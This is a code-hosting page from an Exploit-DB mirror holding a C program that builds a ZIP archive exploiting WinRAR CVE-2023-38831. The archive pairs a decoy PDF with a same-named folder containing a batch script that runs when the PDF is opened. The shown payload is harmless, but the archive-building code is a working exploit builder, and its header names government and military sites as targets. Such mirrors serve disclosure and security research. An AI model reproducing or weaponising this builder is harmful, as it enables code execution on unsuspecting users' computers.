bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/51935.c
Exploit-DB e791587e41 DB: 2024-03-29 
10 changes to exploits/shellcodes/ghdb

RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10 - Denial of Service

Siklu MultiHaul TG series < 2.0.0 - unauthenticated credential disclosure

Dell Security Management Server <1.9.0 - Local Privilege Escalation

Asterisk AMI - Partial File Content & Path Disclosure (Authenticated)

Broken Access Control - on NodeBB v3.6.7

liveSite Version 2019.1 - Remote Code Execution

Purei CMS 1.0 - SQL Injection

Workout Journal App 1.0 - Stored XSS

WinRAR version 6.22 - Remote Code Execution via ZIP archive
2024-03-29 00:16:30 +00:00

98 lines
No EOL
3.7 KiB
C
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

################################################################################################
# Exploit Title :  EXPLOIT WinRAR version 6.22 Vulnerability CVE-2023-38831 #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Security Risk : High #
# #
# Description : All target's GOV & Military websites #
# #
################################################################################################
# #
# Expl0iTs: #
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "zip.h"
#define PDF_FILE "document.pdf"
#define FOLDER_NAME "document.pdf\\"
#define SCRIPT_FILE "script.bat"
#define ZIP_FILE "exploit.zip"
 
int main(void) {
    zipFile zf = zipOpen(ZIP_FILE, APPEND_STATUS_CREATE);
    if (zf == NULL) {
        printf("Error opening ZIP file\n");
        return -1;
    }
    zip_fileinfo zfi;
    memset(&zfi, 0, sizeof(zfi));
    if (zipOpenNewFileInZip(zf, PDF_FILE, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
        printf("Error adding PDF file to ZIP file\n");
        zipClose(zf, NULL);
        return -1;
    }
    FILE *fp = fopen(PDF_FILE, "rb");
    if (fp == NULL) {
        printf("Error opening PDF file\n");
        zipCloseFileInZip(zf);
        zipClose(zf, NULL);
        return -1;
    }
    char buffer[1024];
    int bytes_read;
    while ((bytes_read = fread(buffer, 1, sizeof(buffer), fp)) > 0) {
        if (zipWriteInFileInZip(zf, buffer, bytes_read) < 0) {
            printf("Error writing PDF file to ZIP file\n");
            fclose(fp);
            zipCloseFileInZip(zf);
            zipClose(zf, NULL);
            return -1;
        }
    }
    fclose(fp);
    zipCloseFileInZip(zf);
    if (zipOpenNewFileInZip(zf, FOLDER_NAME, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
        printf("Error adding folder to ZIP file\n");
        zipClose(zf, NULL);
        return -1;
    }
    zipCloseFileInZip(zf);
    char script_name[256];
    sprintf(script_name, "%s%s", FOLDER_NAME, SCRIPT_FILE);
    if (zipOpenNewFileInZip(zf, script_name, &zfi, NULL, 0, NULL, 0, NULL, Z_DEFLATED, Z_DEFAULT_COMPRESSION) != ZIP_OK) {
        printf("Error adding script file to ZIP file\n");
        zipClose(zf, NULL);
        return -1;
    }
    char script_content[] = "@echo off\nstart cmd /c \"echo You have been exploited by CVE-2023-38831 && pause\"\n";
    if (zipWriteInFileInZip(zf, script_content, strlen(script_content)) < 0) {
        printf("Error writing script file to ZIP file\n");
        zipCloseFileInZip(zf);
        zipClose(zf, NULL);
        return -1;
    }
    zipCloseFileInZip(zf);
 
    zipClose(zf, NULL);
 
    printf("ZIP file created successfully\n");
    return 0;
}
https://nvd.nist.gov/vuln/detail/CVE-2023-38831
https://nvd.nist.gov/vuln/detail/CVE-2023-38831
https://github.com/HDCE-inc/CVE-2023-38831
https://www.cvedetails.com/cve/CVE-2023-38831/
https://www.logpoint.com/en/blog/emerging-threats/cve-2023-38831-winrar-decompression-or-arbitrary-code-execution/
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Win32/CVE-2023-38831
http://packetstormsecurity.com/files/174573/WinRAR-Remote-Code-Execution.html
https://blog.google/threat-analysis-group/government-backed-actors-exploiting-winrar-vulnerability/
https://news.ycombinator.com/item?id=37236100
https://www.bleepingcomputer.com/news/security/winrar-zero-day-exploited-since-april-to-hack-trading-accounts/
https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
https://hdce.medium.com/cve-2023-38831-winrar-zero-day-poses-new-risks-for-traders-684911befad2
 
Reference in a new issue View git blame Copy permalink